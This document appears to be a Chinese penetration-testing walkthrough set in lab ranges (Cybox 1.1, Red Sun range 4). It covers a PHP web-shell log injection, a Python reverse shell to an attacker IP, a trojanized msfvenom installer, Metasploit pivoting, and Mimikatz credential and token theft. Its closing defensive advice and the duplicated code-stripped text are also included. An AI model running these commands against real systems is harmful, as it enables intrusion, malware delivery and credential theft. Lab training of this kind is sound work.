网络安全渗透测试实战教学：从Web渗透到内网横向移动

1. 环境准备与靶场搭建

1.1 靶场环境概述

靶机组成：红日靶场四中的域PC、域DC + Cybox 1.1 Web靶机
网络配置：
- 修改攻击机/etc/hosts文件
- 配置DC的DNS解析，将cybox.company指向Web靶机IP

1.2 Vulhub漏洞复现环境

sudo su  # 以root权限执行
docker-compose build  # 构建漏洞容器
docker-compose up -d  # 启动容器
git pull  # 同步最新漏洞环境

2. Cybox-1.1 Web靶机渗透

2.1 信息收集

子域名爆破：

gobuster vhost -u http://cybox.company -w 'dict' -t 64

目录爆破：

python3 dirsearch.py -e * -L url.txt -t 32 -x 400,403

2.2 用户注册与越权漏洞

注册普通用户获取凭证
利用密码重置功能越权修改admin密码：
- 截获重置链接
- 修改email参数为admin

2.3 文件包含漏洞利用

发现styles参数动态加载PHP文件
通过dev.cybox.company查看phpinfo信息
日志文件注入PHP代码：
```
<?php system($_GET['shell']);?>
```
利用User-Agent注入：
- 使用浏览器开发者工具(CTRL+SHIFT+I)
- 选择Network → 数据包 → "Edit and Resend"

2.4 反弹Shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击IP',443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

注意：靶机有iptables限制，只能从21、25、80、443、110、143端口反弹

2.5 Sudo提权

使用smart-linux-enum脚本枚举系统
发现/opt/registerlauncher可疑程序
创建多个用户后发现sudo组权限
执行sudo su获取root权限

3. 内网横向渗透

3.1 Beef与MSF联动

修改Beef配置文件(/usr/share/beef-xss/config.yaml):
- 启用MSF扩展
- 修改默认凭证和端口
修改MSF扩展配置(/usr/share/beef-xss/extensions/metasploit/config.yaml)

启动MSF RPC服务：

load msgrpc ServerHost=XXXXX Pass=XXXXX

3.2 恶意Payload制作

msfvenom -a x86 --platform windows -x flashplayer_32_ax_debug.exe -k -p windows/meterpreter/reverse_tcp lhost=XXXX lport=XXX -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o flashplayer.exe

参数说明：

-k：保留原始程序功能
-e -i 3：进行3次编码
-b "\x00"：剔除坏字符

3.3 代理设置与路由

Meterpreter会话中：

run get_local_subnets
run autoroute -s XXXX/24
background

设置SOCKS代理：

use auxiliary/server/socks_proxy
set srvhost XXXX
run

3.4 MS17-010漏洞扫描

proxychains nmap -sV --top-ports 3000 XXXXX -Pn -T4
proxychains nmap -sV -p445 -iL ip.txt -Pn --script smb-vuln-ms17-010

3.5 令牌窃取与域控攻击

加载kiwi模块：
```
load kiwi
```

查看和窃取令牌：

list_tokens -u
impersonate_token DEMO\\Administrator

域内信息收集：

chcp 65001  # 解决中文乱码
net view  # 查看网内计算机
nbtstat -A IP  # IP查计算机名
dir \\DC\C$  # 访问域控共享

凭证提取：

kiwi_cmd -f lsadump::sam  # 提取SAM
kiwi_cmd -f kerberos::list  # 列出Kerberos票据

4. 防御与检测建议

Web应用防护：
- 严格校验密码重置功能
- 禁用动态文件包含
- 日志文件与Web根目录分离
系统加固：
- 限制sudo权限
- 监控/opt等非标准目录的可执行文件
- 配置严格的iptables规则
域安全：
- 启用UAC最高级别
- 限制域管理员登录范围
- 监控异常令牌使用
安全意识：
- 警惕不明软件更新
- 验证下载文件完整性
- 定期检查系统异常进程

5. 工具与资源

枚举脚本：smart-linux-enum
漏洞环境：Vulhub
代理工具：Proxychains + SOCKS
攻击框架：Metasploit + Beef-XSS

通过本实战教学，我们系统性地学习了从Web渗透到内网横向移动的完整攻击链，涵盖了信息收集、漏洞利用、权限提升、持久化控制等关键环节。

网络安全渗透测试实战教学：从Web渗透到内网横向移动 1. 环境准备与靶场搭建 1.1 靶场环境概述靶机组成：红日靶场四中的域PC、域DC + Cybox 1.1 Web靶机网络配置：修改攻击机 /etc/hosts 文件配置DC的DNS解析，将 cybox.company 指向Web靶机IP 1.2 Vulhub漏洞复现环境 2. Cybox-1.1 Web靶机渗透 2.1 信息收集子域名爆破：目录爆破： 2.2 用户注册与越权漏洞注册普通用户获取凭证利用密码重置功能越权修改admin密码：截获重置链接修改email参数为admin 2.3 文件包含漏洞利用发现 styles 参数动态加载PHP文件通过 dev.cybox.company 查看 phpinfo 信息日志文件注入PHP代码：利用User-Agent注入：使用浏览器开发者工具(CTRL+SHIFT+I) 选择Network → 数据包 → "Edit and Resend" 2.4 反弹Shell 注意：靶机有iptables限制，只能从21、25、80、443、110、143端口反弹 2.5 Sudo提权使用 smart-linux-enum 脚本枚举系统发现 /opt/registerlauncher 可疑程序创建多个用户后发现sudo组权限执行 sudo su 获取root权限 3. 内网横向渗透 3.1 Beef与MSF联动修改Beef配置文件( /usr/share/beef-xss/config.yaml ): 启用MSF扩展修改默认凭证和端口修改MSF扩展配置( /usr/share/beef-xss/extensions/metasploit/config.yaml ) 启动MSF RPC服务： 3.2 恶意Payload制作参数说明： -k ：保留原始程序功能 -e -i 3 ：进行3次编码 -b "\x00" ：剔除坏字符 3.3 代理设置与路由 Meterpreter会话中：设置SOCKS代理： 3.4 MS17-010漏洞扫描 3.5 令牌窃取与域控攻击加载kiwi模块：查看和窃取令牌：域内信息收集：凭证提取： 4. 防御与检测建议 Web应用防护：严格校验密码重置功能禁用动态文件包含日志文件与Web根目录分离系统加固：限制sudo权限监控/opt等非标准目录的可执行文件配置严格的iptables规则域安全：启用UAC最高级别限制域管理员登录范围监控异常令牌使用安全意识：警惕不明软件更新验证下载文件完整性定期检查系统异常进程 5. 工具与资源枚举脚本： smart-linux-enum 漏洞环境： Vulhub 代理工具：Proxychains + SOCKS 攻击框架：Metasploit + Beef-XSS 通过本实战教学，我们系统性地学习了从Web渗透到内网横向移动的完整攻击链，涵盖了信息收集、漏洞利用、权限提升、持久化控制等关键环节。